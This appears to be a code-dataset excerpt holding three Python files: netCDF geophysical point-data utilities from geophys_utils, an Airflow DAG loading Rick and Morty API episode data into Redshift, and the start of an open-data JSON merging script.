@return distances: distances from the target coordinate for each of the points_required nearest points
@return indices: point indices for each of the points_required nearest points
'''
if wkt:
reprojected_coords = transform_coords(coordinates, wkt, self.wkt)
else:
reprojected_coords = coordinates
if secondary_mask is None:
secondary_mask = np.ones(shape=(self.point_count,), dtype=bool)
else:
assert secondary_mask.shape == (self.point_count,)
if max_distance: # max_distance has been specified
logger.debug('Computing spatial subset mask...')
spatial_mask = self.get_spatial_mask([reprojected_coords[0] - max_distance,
reprojected_coords[1] - max_distance,
reprojected_coords[0] + max_distance,
reprojected_coords[1] + max_distance
]
)
point_indices = np.where(np.logical_and(spatial_mask,
secondary_mask
)
)[0]
if not len(point_indices):
logger.debug('No points within distance {} of {}'.format(max_distance, reprojected_coords))
return [], []
# Set up KDTree for nearest neighbour queries
logger.debug('Indexing spatial subset with {} points into KDTree...'.format(np.count_nonzero(spatial_mask)))
kdtree = cKDTree(data=self.xycoords[point_indices])
logger.debug('Finished indexing spatial subset into KDTree.')
else: # Consider ALL points
max_distance = np.inf
kdtree = self.kdtree
distances, indices = kdtree.query(x=np.array(reprojected_coords),
k=points_required,
distance_upper_bound=max_distance)
if max_distance == np.inf:
return distances, indices
else: # Return indices of complete coordinate array, not the spatial subset
return distances, np.where(spatial_mask)[0][indices]
def get_lookup_mask(self,
lookup_value_list,
lookup_variable_name='line',
indexing_variable_name=None,
indexing_dimension='point'
):
'''
Function to return mask array based on lookup variable
'''
if lookup_variable_name:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
if (lookup_variable.shape == ()
or ((len(lookup_variable.shape) == 1) and (lookup_variable.dtype == '|S1'))): # Scalar or string array
dimension = self.netcdf_dataset.dimensions.get(indexing_dimension)
assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension)
# Repeat boolean value across dimension size
return np.array([lookup_variable[:] in lookup_value_list] * dimension.size)
indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
try:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
except:
raise BaseException('indexing_variable_name not supplied and cannot be inferred')
elif indexing_variable_name:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
if hasattr(indexing_variable, 'lookup'):
# Get lookup variable name from variable attribute
lookup_variable_name = indexing_variable.lookup
elif indexing_variable_name.endswith('_index'):
# Infer lookup variable name from indexing variable name
lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
else:
raise BaseException('lookup_variable_name not supplied and cannot be inferred')
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
else:
raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
# Handle special case for string arrays via OPeNDAP
if self.opendap and (lookup_variable.dtype == 'S1') and (len(lookup_variable.shape) == 2):
# Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP
lookup_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in lookup_variable[:]])
# OPeNDAP will truncate strings to 64 characters - truncate search strings to match
lookup_indices = np.arange(lookup_array.shape[0])[np.in1d(lookup_array, np.array([lookup_value[0:64]
for lookup_value in lookup_value_list]))]
else:
lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], np.array(lookup_value_list))]
logger.debug('lookup_indices: {}'.format(lookup_indices))
lookup_mask = np.in1d(indexing_variable, lookup_indices)
logger.debug('lookup_mask: {}'.format(lookup_mask))
return lookup_mask
#===============================================================================
# def lookup_mask_generator(self,
# lookup_value_list,
# lookup_variable_name='line',
# indexing_variable_name=None
# ):
# '''
# Generator to yield mask array based on lookup variable for each of a list of lookup values
# '''
# if lookup_variable_name:
# indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
#
# try:
# indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
# except:
# raise BaseException('indexing_variable_name not supplied and cannot be inferred')
#
# elif indexing_variable_name:
# indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
#
# if hasattr(indexing_variable, 'lookup'):
# # Get lookup variable name from variable attribute
# lookup_variable_name = indexing_variable.lookup
# elif indexing_variable_name.endswith('_index'):
# # Infer lookup variable name from indexing variable name
# lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
# else:
# raise BaseException('lookup_variable_name not supplied and cannot be inferred')
#
# else:
# raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
#
# lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
#
# for lookup_value in lookup_value_list:
# lookup_indices = np.where(lookup_variable[:] == lookup_value)[0]
# logger.debug('lookup_indices: {}'.format(lookup_indices))
#
# lookup_mask = np.in1d(indexing_variable, lookup_indices)
# logger.debug('lookup_mask: {}'.format(lookup_mask))
# yield lookup_mask
#
#===============================================================================
def get_index_mask(self,
lookup_value_list,
lookup_variable_name='line',
start_index_variable_name=None,
count_variable_name=None,
point_count=None
):
'''
Function to return mask array based on index variable
'''
try:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
except:
raise BaseException('Invalid lookup_variable_name')
start_index_variable_name = start_index_variable_name or lookup_variable_name + '_start_index'
try:
start_index_variable = self.netcdf_dataset.variables[start_index_variable_name]
except:
raise BaseException('start_index_variable_name not supplied and cannot be inferred')
count_variable_name = count_variable_name or lookup_variable_name + '_count'
try:
count_variable = self.netcdf_dataset.variables[count_variable_name]
except:
raise BaseException('count_variable_name not supplied and cannot be inferred')
point_count = point_count or self.netcdf_dataset.dimensions['point'].size
lookup_indices = np.arange(lookup_variable.shape[0])[np.in1d(lookup_variable[:], lookup_value_list)]
logger.debug('lookup_indices: {}'.format(lookup_indices))
start_indices = start_index_variable[lookup_indices]
logger.debug('start_indices: {}'.format(start_indices))
counts = count_variable[lookup_indices]
logger.debug('counts: {}'.format(counts))
# Build mask
index_mask = np.zeros(shape=(point_count,), dtype='bool')
for lookup_index in range(len(lookup_indices)):
index_mask[start_indices[lookup_index]:start_indices[lookup_index]+counts[lookup_index]] = True
return index_mask
def expand_lookup_variable(self,
lookup_variable_name='line',
indexing_variable_name=None,
start_index=0,
end_index=0,
mask=None,
indexing_dimension='point'):
'''
Function to expand lookup variables and return an array of the required size
'''
if lookup_variable_name:
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
if lookup_variable.shape == (): # Scalar
dimension = self.netcdf_dataset.dimensions.get(indexing_dimension)
assert dimension, 'Invalid indexing_dimension {} specified'.format(indexing_dimension)
# Repeat boolean value across dimension size
return np.array([lookup_variable[:]] * dimension.size)
indexing_variable_name = indexing_variable_name or lookup_variable_name + '_index'
try:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
except:
raise BaseException('indexing_variable_name not supplied and cannot be inferred')
elif indexing_variable_name:
indexing_variable = self.netcdf_dataset.variables[indexing_variable_name]
if hasattr(indexing_variable, 'lookup'):
# Get lookup variable name from variable attribute
lookup_variable_name = indexing_variable.lookup
elif indexing_variable_name.endswith('_index'):
# Infer lookup variable name from indexing variable name
lookup_variable_name = re.sub('_index$', '', indexing_variable_name)
else:
raise BaseException('lookup_variable_name not supplied and cannot be inferred')
lookup_variable = self.netcdf_dataset.variables[lookup_variable_name]
else:
raise BaseException('Must supply either lookup_variable_name or indexing_variable_name')
end_index = end_index or indexing_variable.shape[0] # Usually this will be the point count
index_range = end_index - start_index
if mask is None: # No mask defined - take all points in range
subset_mask = np.ones(shape=(index_range,), dtype='bool')
else:
subset_mask = mask[start_index:end_index]
lookup_variable.set_auto_mask(False)
indexing_variable.set_auto_mask(False)
result_array = lookup_variable[:][indexing_variable[start_index:end_index][subset_mask]] # Need to index numpy array, not netCDF variable
# Convert 2D byte array into 1D array of unicode strings - needed for OPeNDAP
if result_array.dtype == 'S1':
result_array = np.array([bytestring[bytestring != b''].tostring().decode('UTF8') for bytestring in result_array])
return result_array
def chunk_point_data_generator(self,
start_index=0,
end_index=0,
field_list=None,
mask=None,
yield_variable_attributes_first=False):
'''
Generator to optionally yield variable attributes followed by all point data for the specified point index range
Used to retrieve data as chunks for outputting as point-wise lists of lists
@param start_index: start point index of range to read
@param end_index: end point index of range to read. Defaults to number of points
@param field_list: Optional list of field names to read. Default is None for all variables
@param mask: Optional Boolean mask array to subset points
@param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to False
@yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True
@yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point
'''
# Start of point_data_generator function
end_index = end_index or self.point_count
index_range = end_index - start_index
if mask is None: # No mask defined - take all points in range
subset_mask = np.ones(shape=(index_range,), dtype='bool')
else:
subset_mask = mask[start_index:end_index]
index_range = np.count_nonzero(subset_mask)
# If no points to retrieve, don't read anything
if not index_range:
logger.debug('No points to retrieve for point indices {}-{}: All masked out'.format(start_index, end_index-1))
return
# Generate full field list if None provided
if not field_list:
field_list = [variable.name
for variable in self.netcdf_dataset.variables.values()
if (not len(variable.dimensions) # Scalar variable
or variable.dimensions[0] == 'point' # Variable is of point dimension
or (variable.dimensions[0] + '_index' in self.netcdf_dataset.variables.keys() # Variable has an index variable
and len(self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions) # index variable is not a scalar
and self.netcdf_dataset.variables[variable.dimensions[0] + '_index'].dimensions[0] == 'point' # index variable is of point dimension
)
)
and not variable.name.endswith('_index')
and not hasattr(variable, 'lookup') # Variable is not an index variable
and not variable.name in NetCDFUtils.CRS_VARIABLE_NAMES
and not re.match('ga_.+_metadata', variable.name) # Not an excluded variable
]
logger.debug('field_list: {}'.format(field_list))
variable_attributes = OrderedDict()
memory_cache = OrderedDict()
for variable_name in field_list:
variable = self.netcdf_dataset.variables.get(variable_name)
if variable is None:
logger.warning('Variable {} does not exist. Skipping.'.format(variable_name))
continue
#logger.debug('variable_name: {}'.format(variable_name))
# Scalar variable
if len(variable.shape) == 0:
# Skip CRS variable
if variable_name in NetCDFUtils.CRS_VARIABLE_NAMES or re.match('ga_.+_metadata', variable_name):
continue
# Repeat scalar value for each point
data_array = variable[:]
memory_cache[variable_name] = np.array([data_array] * index_range)
else: # nD array variable
if (variable.dimensions[0] != 'point'): # Variable is NOT of point dimension - must be lookup
memory_cache[variable_name] = self.expand_lookup_variable(lookup_variable_name=variable_name,
start_index=start_index,
end_index=end_index,
mask=mask)
else: # 'point' is in variable.dimensions - "normal" variable
data_array = variable[start_index:end_index]
# Include fill_values if array is masked
if type(data_array) == np.ma.core.MaskedArray:
data_array = data_array.data
memory_cache[variable_name] = data_array[subset_mask]
if yield_variable_attributes_first:
variable_attributes[variable_name] = dict(variable.__dict__)
logger.debug('variable_attributes: {}'.format(pformat(variable_attributes)))
logger.debug('memory_cache: {}'.format(pformat(memory_cache)))
if yield_variable_attributes_first:
yield variable_attributes
for index in range(index_range):
point_value_list = []
for variable_name, variable in iter(memory_cache.items()):
data_array = variable[index]
# Convert array to string if required
if type(data_array) == np.ndarray and data_array.dtype == object:
data_array = str(data_array)
point_value_list.append(data_array)
yield point_value_list
logger.debug('{} points read for point indices {}-{}'.format(index_range, start_index, end_index-1))
def all_point_data_generator(self,
field_list=None,
mask=None,
read_chunk_size=None,
yield_variable_attributes_first=True):
'''
Generator to yield variable attributes followed by lists of values for all points
@param field_list: Optional list of field names to read. Default is None for all variables
@param mask: Optional Boolean mask array to subset points
@param read_chunk_size: Number of points to read from the netCDF per chunk (for greater efficiency than single point reads)
@param yield_variable_attributes_first: Boolean flag to determine whether variable attribute dict is yielded first. Defaults to True
@yield variable_attributes: dict of netCDF variable attributes. Optionally the first item yielded if yield_variable_attributes_first is True
@yield point_value_list: List of single values for 1D variables or sub-lists for 2D variables for a single point
'''
read_chunk_size = read_chunk_size or DEFAULT_READ_CHUNK_SIZE
# Process all chunks
point_count = 0
for chunk_index in range(self.point_count // read_chunk_size + 1):
for line in self.chunk_point_data_generator(field_list=field_list,
start_index=chunk_index*read_chunk_size,
end_index=min((chunk_index+1)*read_chunk_size,
self.point_count
),
mask=mask,
yield_variable_attributes_first=yield_variable_attributes_first
):
if not yield_variable_attributes_first:
point_count += 1
yield_variable_attributes_first = False # Only yield variable attributes from the first chunk
#logger.debug('line: {}'.format(line))
yield line
if POINT_LIMIT and (point_count >= POINT_LIMIT):
break
if POINT_LIMIT and (point_count >= POINT_LIMIT):
break
logger.debug('{} points read from netCDF file {}'.format(point_count, self.nc_path))
def get_xy_coord_values(self):
'''
Function to return a full in-memory coordinate array from source dataset
'''
logger.debug('Reading xy coordinates from source dataset')
xycoord_values = np.zeros(shape=(len(self.x_variable), 2), dtype=self.x_variable.dtype)
self.fetch_array(self.x_variable, xycoord_values[:,0])
self.fetch_array(self.y_variable, xycoord_values[:,1])
# Deal with netCDF4 Datasets that have had set_auto_mask(False) called
if hasattr(self.x_variable, '_FillValue'):
xycoord_values[:,0][xycoord_values[:,0] == self.x_variable._FillValue] = np.nan
if hasattr(self.y_variable, '_FillValue'):
xycoord_values[:,1][xycoord_values[:,1] == self.y_variable._FillValue] = np.nan
return xycoord_values
@property
def xycoords(self):
'''
Property getter function to return pointwise array of XY coordinates
The order of priority for retrieval is memory, memcached, disk cache then dataset.
'''
xycoords = None
# assert np.allclose(arr, arr_down)
if self.enable_memory_cache and self._xycoords is not None:
#logger.debug('Returning memory cached coordinates')
return self._xycoords
elif self.memcached_connection is not None:
coord_cache_key = self.cache_basename + '_xycoords'
logger.debug("hit xycoords propery code")
logger.debug(self.memcached_connection)
xycoords = self.memcached_connection.get(coord_cache_key)
if xycoords is not None:
# self.memcached_connection.get(self.cache_path) is True:
logger.debug('memcached key found at {}'.format(coord_cache_key))
#logger.debug('xycoords: {}'.format(xycoords))
else:
xycoords = self.get_xy_coord_values()
logger.debug("key not found at {}. adding key and value".format(coord_cache_key))
self.memcached_connection.add(coord_cache_key, xycoords)
elif self.enable_disk_cache:
if os.path.isfile(self.cache_path):
# Cached coordinate file exists - read it
cache_dataset = netCDF4.Dataset(self.cache_path, 'r')
#assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path)
if 'xycoords' in cache_dataset.variables.keys():
xycoords = cache_dataset.variables['xycoords'][:]
logger.debug('Read {} coordinates from cache file {}'.format(xycoords.shape[0], self.cache_path))
else:
logger.debug('Unable to read xycoords variable from netCDF cache file {}'.format(self.cache_path))
cache_dataset.close()
else:
logger.debug('NetCDF cache file {} does not exist'.format(self.cache_path))
if xycoords is None:
xycoords = self.get_xy_coord_values() # read coords from source file
os.makedirs(os.path.dirname(self.cache_path), exist_ok=True)
if os.path.isfile(self.cache_path):
cache_dataset = netCDF4.Dataset(self.cache_path, 'r+')
else:
cache_dataset = netCDF4.Dataset(self.cache_path, 'w')
if not hasattr(cache_dataset, 'source'):
cache_dataset.source = self.nc_path
#assert cache_dataset.source == self.nc_path, 'Source mismatch: cache {} vs. dataset {}'.format(cache_dataset.source, self.nc_path)
if 'point' not in cache_dataset.dimensions.keys():
cache_dataset.createDimension(dimname='point', size=xycoords.shape[0])
if 'xy' not in cache_dataset.dimensions.keys():
cache_dataset.createDimension(dimname='xy', size=xycoords.shape[1])
if 'xycoords' not in cache_dataset.variables.keys():
cache_dataset.createVariable('xycoords',
xycoords.dtype,
dimensions=['point', 'xy'],
**self.CACHE_VARIABLE_PARAMETERS
)
cache_dataset.variables['xycoords'][:] = xycoords # Write coords to cache file
cache_dataset.close()
logger.debug('Saved {} coordinates to cache file {}'.format(xycoords.shape[0], self.cache_path))
else: # No caching - read coords from source file
xycoords = self.get_xy_coord_values()
if self.enable_memory_cache:
self._xycoords = xycoords
return xycoords
@property
def point_variables(self):
'''
Property getter function to return point_variables as required
'''
if not self._point_variables:
logger.debug('Setting point_variables property')
self._point_variables = list([var_name for var_name in self.netcdf_dataset.variables.keys()
if 'point' in self.netcdf_dataset.variables[var_name].dimensions
and var_name not in ['latitude', 'longitude', 'easting', 'northing', 'point', 'fiducial', 'flag_linetype']
])
return self._point_variables
@property
def data_variable_list(self):
'''
Property getter function to return data_variable_list as required
'''
if not self._data_variable_list:
logger.debug('Setting data_variable_list property')
self._data_variable_list = [key for key, value in self.netcdf_dataset.variables.items()
if 'point' in value.dimensions]
return self._data_variable_list
@property
def kdtree(self):
'''
Property getter function to return data_variable_list as required
'''
if not self._kdtree:
logger.debug('Indexing full dataset with {} points into KDTree...'.format(self.xycoords.shape[0]))
self._kdtree = cKDTree(data=self.xycoords, balanced_tree=False)
logger.debug('Finished indexing full dataset into KDTree.')
return self._kdtree
def copy(self,
nc_out_path,
datatype_map_dict={},
variable_options_dict={},
dim_range_dict={},
dim_mask_dict={},
nc_format=None,
limit_dim_size=False,
var_list=[],
empty_var_list=[],
to_crs=None
):
'''
Function to copy a netCDF dataset to another one with potential changes to size, format,
variable creation options and datatypes.
@param nc_out_path: path to netCDF output file
@param to_crs: WKT of destination CRS
'''
if var_list:
expanded_var_list = list(set(
var_list +
NetCDFUtils.X_DIM_VARIABLE_NAMES +
NetCDFUtils.Y_DIM_VARIABLE_NAMES +
NetCDFUtils.CRS_VARIABLE_NAMES +
['line', 'line_index'] # Always include line numbers (This really should be in an overridden function in NetCDFLineUtils)
))
else:
expanded_var_list = var_list
# Call inherited NetCDFUtils method
super().copy(
nc_out_path,
datatype_map_dict=datatype_map_dict,
variable_options_dict=variable_options_dict,
dim_range_dict=dim_range_dict,
dim_mask_dict=dim_mask_dict,
nc_format=nc_format,
limit_dim_size=limit_dim_size,
var_list=expanded_var_list,
empty_var_list=empty_var_list,
)
# Finish up if no reprojection required
dest_srs = get_spatial_ref_from_wkt(to_crs)
if not to_crs or dest_srs.IsSame(get_spatial_ref_from_wkt(self.wkt)):
logger.debug('No reprojection required for dataset {}'.format(nc_out_path))
return
try:
logger.debug('Re-opening new dataset {}'.format(nc_out_path))
new_dataset = netCDF4.Dataset(nc_out_path, 'r+')
new_ncpu = NetCDFPointUtils(new_dataset, debug=self.debug)
logger.debug('Reprojecting {} coordinates in new dataset'.format(len(new_ncpu.x_variable)))
#TODO: Check coordinate variable data type if changing between degrees & metres
new_ncpu._xycoords = transform_coords(new_ncpu.xycoords, self.wkt, to_crs)
new_ncpu.x_variable[:] = new_ncpu._xycoords[:,0]
new_ncpu.y_variable[:] = new_ncpu._xycoords[:,1]
crs_variable_name, crs_variable_attributes = self.get_crs_attributes(to_crs)
logger.debug('Setting {} variable attributes'.format(crs_variable_name))
# Delete existing crs variable attributes
for key in new_ncpu.crs_variable.__dict__.keys():
if not key.startswith('_'):
delattr(new_ncpu.crs_variable, key)
try:
delattr(new_ncpu.x_variable, key)
delattr(new_ncpu.y_variable, key)
except:
pass
# Set new crs variable attributes
new_ncpu.crs_variable.setncatts(crs_variable_attributes)
new_ncpu.x_variable.setncatts(crs_variable_attributes)
new_ncpu.y_variable.setncatts(crs_variable_attributes)
# Rename variables if switching between projected & unprojected
if crs_variable_name != new_ncpu.crs_variable.name:
logger.debug('Renaming {} variable to {}'.format(new_ncpu.crs_variable.name, crs_variable_name))
new_dataset.renameVariable(new_ncpu.crs_variable.name, crs_variable_name)
if crs_variable_name == 'crs': # Geodetic
xy_varnames = ('longitude', 'latitude')
units = dest_srs.GetAngularUnitsName() + 's' # degrees
elif crs_variable_name in ['transverse_mercator', "albers_conical_equal_area"]: # Projected
xy_varnames = ('x', 'y')
units = dest_srs.GetLinearUnitsName() + 's' # metres
else:
raise BaseException('Unhandled crs variable name "{}"'.format(crs_variable_name))
logger.debug('Renaming {} & {} variables to {} & {}'.format(new_ncpu.x_variable.name,
new_ncpu.y_variable.name,
*xy_varnames
))
new_dataset.renameVariable(new_ncpu.x_variable.name, xy_varnames[0])
new_ncpu.x_variable.units = units
new_ncpu.x_variable.long_name = xy_varnames[0]
new_dataset.renameVariable(new_ncpu.y_variable.name, xy_varnames[1])
new_ncpu.y_variable.units = units
new_ncpu.y_variable.long_name = xy_varnames[1]
finally:
new_dataset.close()
def set_global_attributes(self, compute_shape=False, clockwise_polygon_orient=False):
'''\
Function to set global geometric metadata attributes in netCDF file
N.B: This will fail if dataset is not writable
'''
try:
metadata_srs = get_spatial_ref_from_wkt(METADATA_CRS)
assert metadata_srs.IsGeographic(), 'Unable to set geodetic parameters for this dataset'
#===================================================================
# # Reopen as writable dataset
# filepath = self.netcdf_dataset.filepath()
# self.netcdf_dataset.close()
# self.netcdf_dataset = netCDF4.Dataset(filepath, 'r+')
#===================================================================
logger.debug('Setting global geometric metadata attributes in netCDF point dataset with {} points'.format(self.netcdf_dataset.dimensions['point'].size))
attribute_dict = dict(zip(['geospatial_lon_min', 'geospatial_lat_min', 'geospatial_lon_max', 'geospatial_lat_max'],
get_reprojected_bounds(self.bounds, self.wkt, METADATA_CRS)
)
)
attribute_dict['geospatial_lon_units'] = 'degree_east'
attribute_dict['geospatial_lat_units'] = 'degree_north'
attribute_dict['geospatial_bounds_crs'] = metadata_srs.ExportToPrettyWkt()
if compute_shape:
try:
logger.debug('Computing concave hull')
attribute_dict['geospatial_bounds'] = shapely.wkt.dumps(
self.get_concave_hull(
to_wkt=METADATA_CRS,
clockwise_polygon_orient=clockwise_polygon_orient
),
rounding_precision=SHAPE_ORDINATE_DECIMAL_PLACES)
except Exception as e:
logger.warning('Unable to compute concave hull shape: {}'.format(e))
try:
self.netcdf_dataset.geospatial_bounds = shapely.wkt.dumps(asPolygon([
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']],
[attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_min']],
[attribute_dict['geospatial_lon_max'], attribute_dict['geospatial_lat_max']],
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_max']],
[attribute_dict['geospatial_lon_min'], attribute_dict['geospatial_lat_min']],
]))
except:
pass
logger.debug('attribute_dict = {}'.format(pformat(attribute_dict)))
logger.debug('Writing global attributes to netCDF file {}'.format(self.netcdf_dataset.filepath()))
for key, value in attribute_dict.items():
setattr(self.netcdf_dataset, key, value)
logger.debug('Finished setting global geometric metadata attributes in netCDF point dataset')
except:
logger.error('Unable to set geometric metadata attributes in netCDF point dataset')
raise
def set_variable_actual_range_attribute(self):
'''\
Function to set ACDD actual_range attribute in all non-index point-dimensioned variables
N.B: Will fail if dataset is not writable
'''
self.netcdf_dataset.set_auto_mask(True)
try:
for variable_name, variable in self.netcdf_dataset.variables.items():
# Skip all variables not of point dimensionality
if 'point' not in variable.dimensions:
continue
# Skip index variables
if re.search('_index$', variable_name):
continue
try:
variable.actual_range = np.array(
[np.nanmin(variable[:]), np.nanmax(variable[:])], dtype=variable.dtype)
logger.debug('{}.actual_range = {}'.format(variable_name, variable.actual_range))
except:
logger.warning('Unable to compute actual_range value for point variable {}'.format(variable_name))
except:
logger.error('Unable to set variable actual_range metadata attributes in netCDF point dataset')
raise
def main(debug=True):
'''
Main function for quick and dirty testing
'''
netcdf_path = sys.argv[1]
netcdf_dataset = netCDF4.Dataset(netcdf_path, 'r')
ncpu = NetCDFPointUtils(netcdf_dataset, debug=debug) # Enable debug output here
# Create mask for last ten points
mask = np.zeros(shape=(ncpu.point_count,), dtype='bool')
mask[-10:] = True
# Set list of fields to read
field_list = None
#field_list = ['latitude', 'longitude', 'obsno', 'reliab']
point_data_generator = ncpu.all_point_data_generator(field_list, mask)
# Retrieve point variable attributes first
variable_attributes = next(point_data_generator)
logger.info('variable_attributes: {}'.format(variable_attributes))
# Use long names instead of variable names where they exist
field_names = [variable_attributes[variable_name].get('long_name') or variable_name
for variable_name in variable_attributes.keys()]
logger.info('field_names: {}'.format(field_names))
for point_data in point_data_generator:
#logger.debug('point_data: {}'.format(pformat(point_data)))
result_dict = dict(zip(field_names, point_data))
logger.info('result_dict: {}'.format(result_dict))
if __name__ == '__main__':
# Setup logging handlers if required
console_handler = logging.StreamHandler(sys.stdout)
#console_handler.setLevel(logging.INFO)
console_handler.setLevel(logging.DEBUG)
console_formatter = logging.Formatter('%(message)s')
console_handler.setFormatter(console_formatter)
if not logger.handlers:
# Set handler for root logger to standard output
logger.addHandler(console_handler)
logger.debug('Logging handlers set up for logger {}'.format(logger.name))
ncu_logger = logging.getLogger('geophys_utils._netcdf_utils')
if not ncu_logger.handlers:
ncu_logger.addHandler(console_handler)
logger.debug('Logging handlers set up for {}'.format(ncu_logger.name))
main()
|
GeoscienceAustralia/geophys_utils
|
geophys_utils/_netcdf_point_utils.py
|
_netcdf_point_utils.py
|
py
| 66,225 |
python
|
en
|
code
| 22 |
github-code
|
6
|
31106779539
|
from datetime import datetime
import requests
import pandas as pd
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.postgres_operator import PostgresOperator
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extras import execute_values
import time
default_args = {
    'owner': 'JORGE',
    'start_date': datetime(2023, 5, 18),
}
def obtener_datos():
url = 'https://rickandmortyapi.com/api/episode'
datos_obtenidos = []
while url is not None:
response = requests.get(url)
data = response.json()
datos_obtenidos += data['results']
url = data['info']['next']
df_episodios = pd.DataFrame(datos_obtenidos)
df_episodios.to_dict('records')
df_episodios = df_episodios.drop(columns=['characters','url'])
df_episodios.columns = ["id","nombre_episodio", "fecha_aire", "episodio","fecha_creacion"]
hook = PostgresHook(postgres_conn_id='amazon_redshift')
conn = hook.get_conn()
cur = conn.cursor()
tabla = "episodio"
columns = ['id', 'nombre_episodio', 'fecha_aire', 'episodio', 'fecha_creacion']
values = [tuple(x) for x in df_episodios.to_numpy()]
insert_sql = f"INSERT INTO {tabla} ({', '.join(columns)}) VALUES %s"
cur.execute("BEGIN")
execute_values(cur, insert_sql, values)
conn.commit()
cur.close()
conn.close()
with DAG(
    default_args=default_args,
    dag_id='carga_de_episodios',
    description='Obtener datos de API, transformar y cargar en Redshift',
    schedule_interval='0 0 * * *',  # the schedule belongs on the DAG itself; Airflow ignores it in default_args
) as dag:
crear_tabla = PostgresOperator(
task_id='crear_tabla_episodio',
postgres_conn_id='amazon_redshift',
sql="""
DROP TABLE IF EXISTS jorgeflores2311233_coderhouse.episodio;
CREATE TABLE jorgeflores2311233_coderhouse.episodio(
id INTEGER PRIMARY KEY,
nombre_episodio VARCHAR(250),
fecha_aire VARCHAR(250),
episodio VARCHAR(250),
fecha_creacion DATETIME
);
"""
)
obtener_datos_episodios = PythonOperator(
task_id='obtener_datos',
python_callable=obtener_datos
)
crear_tabla >> obtener_datos_episodios
|
jorge-flores-py/rick-morty
|
dags/dag_carga_automatica_episodios.py
|
dag_carga_automatica_episodios.py
|
py
| 2,329 |
python
|
es
|
code
| 0 |
github-code
|
6
|
72052702908
|
#!/usr/bin/env python
# coding: utf-8
""" This script collects all the data in orgs and sources folders and merge them in a single json file. """
import json, pathlib, os, sys
### ENVIRONMENTAL VARIABLES
# environmental variables can be set in order to override default values
# NOTE: you can use relative or absolute paths, with or without a separator at the end of folder names
# the folder that contains sources json files
# default: './sources'
env_sources = 'OPENDATA_SOURCES_DIR'
# the folder containing the organization details
# default: './orgs'
env_organizations = 'OPENDATA_ORGANIZATIONS_DIR'
# the filename that will store all results (include extension)
# default: './dist/index.json'
env_dist_filename = 'OPENDATA_DIST_FILENAME'
# the filename that will store nested results (include extension)
# default: './dist/nested/index.json'
env_nested_filename = 'OPENDATA_NESTED_FILENAME'
# shall the script override the data?
# default: True
env_allow_override = 'OPENDATA_CAN_OVERRIDE'
# It may be desirable to remove the owner_org key from the source since it is implicit.
# This saves a few bytes in the final json file. If you want to keep the owner_org key
# feel free to set the variable to True
# default: False
env_keep_owner = 'OPENDATA_KEEP_OWNER'
# in case you want just to output to the console (i.e. if you want to pipe the results into a parser)
# default: False
env_to_stdout = 'OPENDATA_USE_STDOUT'
### DEFAULT SETTINGS
falsy_strings = ('no', 'false', 'never', 'n', 'f', 'falso', 'mai') # add other strings if necessary (?)
empty = ('', None)
sources_dir = os.environ[env_sources] if (env_sources in os.environ) and (os.environ[env_sources] not in empty) else pathlib.Path('.', 'sources')
orgs_dir = os.environ[env_organizations] if (env_organizations in os.environ) and (os.environ[env_organizations] not in empty) else pathlib.Path('.', 'orgs')
dist_filename = os.environ[env_dist_filename] if (env_dist_filename in os.environ) and (os.environ[env_dist_filename] not in empty) else pathlib.Path('.', 'dist/index.json')
nested_filename = os.environ[env_nested_filename] if (env_nested_filename in os.environ) and (os.environ[env_nested_filename] not in empty) else pathlib.Path('.', 'dist/nested/index.json')
override = (os.environ[env_allow_override].lower() not in falsy_strings) if (env_allow_override in os.environ) and (os.environ[env_allow_override] not in empty) else True
keep_owner = (os.environ[env_keep_owner].lower() not in falsy_strings) if (env_keep_owner in os.environ) and (os.environ[env_keep_owner] not in empty) else False
to_stdout = (os.environ[env_to_stdout].lower() not in falsy_strings) if (env_to_stdout in os.environ) and (os.environ[env_to_stdout] not in empty) else False
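# Example (hypothetical paths shown): the defaults above can be overridden from the shell before
# invoking the script, e.g.
#   OPENDATA_SOURCES_DIR=./my-sources OPENDATA_DIST_FILENAME=./out/all.json python export_all.py
# Setting OPENDATA_CAN_OVERRIDE to one of the falsy strings above (e.g. 'no') keeps existing
# output files from being overwritten.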
# A dictionary to guide in the classification of the organizations.
# There are two main branches, "nazionale" (national) and "locale" (local).
# Every branch has an inner dictionary. The inner dictionary keys are the first word in org.name whereas
# the dictionary values are the keys to be used to identify the type of organization in json output.
# You can customize the values returned; the key "*" is used as a catch-all alternative if the first word
# in org.name is not present in the dictionary's branch.
classification = {
'nazionale': {
'ministero': 'ministero',
'*': 'altro'
},
'locale': {
'citta': 'citta metropolitana',
'comune': 'comune',
'provincia': 'provincia',
'regione': 'regione',
'universita': 'universita',
'*': 'altro'
}
}
### UTILITIES
def classify(organization):
"""
    the function checks the first word in the organization's name
and returns a list of keys to be used to classify it.
"""
first_word = organization['name'].split('-')[0]
category = 'locale' if 'region' in organization.keys() else 'nazionale'
